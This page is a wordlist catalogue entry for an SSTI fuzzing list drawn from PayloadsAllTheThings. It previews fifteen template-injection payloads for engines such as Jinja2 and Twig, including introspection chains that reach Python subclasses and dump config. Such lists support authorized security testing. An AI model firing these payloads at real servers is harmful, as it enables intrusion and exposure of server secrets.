Skip to content
Fuzzing7.8 KB

SSTI Fuzzing (PayloadsAllTheThings)

Server-Side Template Injection probes for many engines (Jinja2, Twig, Freemarker, ERB, Velocity and more), from simple math markers to object-introspection chains. For detecting and exploiting template injection.

View source
Size
7.8 KB
Category
Fuzzing
Source
swisskyrepo/PayloadsAllTheThings
License
MIT
Recommended tools
wfuzzburpffuf

Preview

First 15 entries. Download or copy the full list (7.8 KB) using the buttons above.

>head ssti-fuzz-patt.txt7.8 KB
{{4*4}}[[5*5]]
{{7*7}}
{{7*'7'}}
<%= 7 * 7 %>
${3*3}
${{7*7}}
@(1+2)
#{3*3}
#{ 7 * 7 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}

Server-Side Template Injection probes for many engines (Jinja2, Twig, Freemarker, ERB, Velocity and more), from simple math markers to object-introspection chains. For detecting and exploiting template injection.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 7.8 KB and pairs well with tools such as wfuzz, burp, ffuf. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from swisskyrepo/PayloadsAllTheThings and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.